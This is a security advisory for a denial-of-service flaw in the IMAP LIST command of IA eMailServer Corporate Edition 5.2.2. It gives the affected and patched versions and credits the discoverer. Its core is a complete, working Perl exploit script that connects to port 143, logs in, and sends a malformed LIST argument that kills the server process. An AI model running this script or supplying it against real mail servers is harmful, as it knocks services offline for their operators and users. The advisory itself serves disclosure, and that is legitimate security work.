IAeMailServer_DOS.pl.txt

`Summary:  
Denial of Service Vulnerability in True North Software, Inc. IA  
eMailServer Corporate Edition Version: 5.2.2. Build: 1051.  
(http://www.tnsoft.com/)  
  
Details:  
Input to the IMAP4 LIST command is not properly checked and/or  
filtered. Issuing a single character '%x' as the second argument to  
the LIST command will cause the MailServer.exe process to die.  
  
Vulnerable Versions:  
True North Software, Inc. IA eMailServer Corporate Edition Version:  
5.2.2. Build: 1051.  
  
Patches/Workarounds:  
IA eMailServer Corporate Edition Version: 5.3.4. Build: 2019. is not  
vulnerable to this attack. It is available at http://www.tnsoft.com/.  
  
Exploit:  
Run the following PERL script against the server. The process will die.  
  
#===== Start IAeMailServer_DOS.pl =====  
#  
# Usage: IAeMailServer_DOS.pl <ip>  
# IAeMailServer_DOS.pl 127.0.0.1  
#  
# True North Software, Inc. IA eMailServer Corporate Edition  
# Version: 5.2.2. Build: 1051.  
#  
# Download:  
# http://www.tnsoft.com/  
#  
#############################################################  
  
use IO::Socket;  
use strict;  
  
my($socket) = "";  
  
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],  
PeerPort => "143",  
Proto => "TCP"))  
{  
print "Attempting to kill IA eMailServer at $ARGV[0]:143...";  
  
sleep(1);  
  
print $socket "0000 LOGIN hello moto\r\n";  
  
sleep(1);  
  
print $socket "0001 LIST 1 \%x\r\n";  
  
close($socket);  
}  
else  
{  
print "Cannot connect to $ARGV[0]:143\n";  
}  
#===== End IAeMailServer_DOS.pl =====  
  
Discovered by Reed Arvin reedarvin[at]gmail[dot]com  
(http://reedarvin.thearvins.com/)  
  
Vulnerability discovered using PeachFuzz  
(http://reedarvin.thearvins.com/tools.html)  
`